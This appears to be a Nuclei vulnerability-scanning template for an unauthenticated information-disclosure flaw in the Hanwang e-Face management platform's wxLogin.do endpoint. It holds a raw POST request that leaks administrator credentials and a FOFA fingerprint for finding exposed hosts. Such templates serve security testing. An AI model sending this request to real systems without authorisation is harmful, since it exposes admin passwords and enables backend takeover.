http:
    - matchers:
        - dsl:
            - status_code == 200 && contains (body,'password')
          name: 敏感信息泄露
          type: dsl
      raw:
        - |-
          POST /manage/m/wxLogin.do?openid=1&username=admin&password=1&id=1&flag=1 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Connection: close
id: Hanwang-wxLogin-Information-disclosure
info:
    author: HuanXiong
    description: |-
        fofa: icon_hash="1380907357"
        汉王e脸通综合管理平台 wxLogin.do 接囗处存在信息泄露漏洞。未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码等信息，破解密码后可直接登录后台，使系统处于极不安全的状态。
    name: 汉王e脸通综合管理平台 wxLogin.do 敏感信息泄露
    severity: medium
    tags:
        - Information disclosure
